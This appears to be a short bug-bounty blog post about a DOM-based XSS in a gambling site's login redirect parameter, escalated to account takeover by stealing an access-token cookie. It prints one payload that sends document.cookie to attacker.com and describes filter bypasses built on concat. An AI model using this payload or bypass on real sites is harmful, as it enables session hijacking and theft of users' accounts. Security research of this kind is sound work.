XSS to Account Takeover

3 min readJun 4, 2021


One of the hottest topics in today’s world is the gambling industry. Most of these websites use the same script. Therefore, if one of them is vulnerable, several million users could be at risk!

1 — Recon
To begin with, I examined several pages on the website for vulnerabilities but did not conclude. Then, I noticed that the login page was displayed to me despite being logged in. There is no impact. It may be the developer’s fault, but what if I discover a vulnerability on this page?

Login Page

By inspecting the source of the page, I found a parameter called “return”. This parameter specifies the address that the user will be redirected to after logging in.

Source Code

2 — Vulnerability
The DOM-Based XSS bug was the first thing that came to my mind. As you can see, user information including access token, name, username, balance, etc. is stored in cookies. JavaScript isn’t permitted to read HTTPOnly cookies for security reasons; however, the access_token flag is not enabled, which is exactly what we need!

using different phrases, I found the forbidden characters. The next step is to prepare the payload to steal cookies from the user.

forbidden characters

3 — Payload & Bypass
To send cookies to our server, we must use the following payload. but the problem is that the characters are filtered, so it does not work!

var url = “http://attacker.com/evil.php?cookie=" + document.cookie; document.location = url;

Let’s bypass it:


Next problem:
We cannot add cookies to our URL because the plus sign (+) is filtered.
How to bypass it?
Separate the URL into two parts (attacker server and cookies), then combine them in a new variable using the “concat” function.

4 — Attack

Final Payload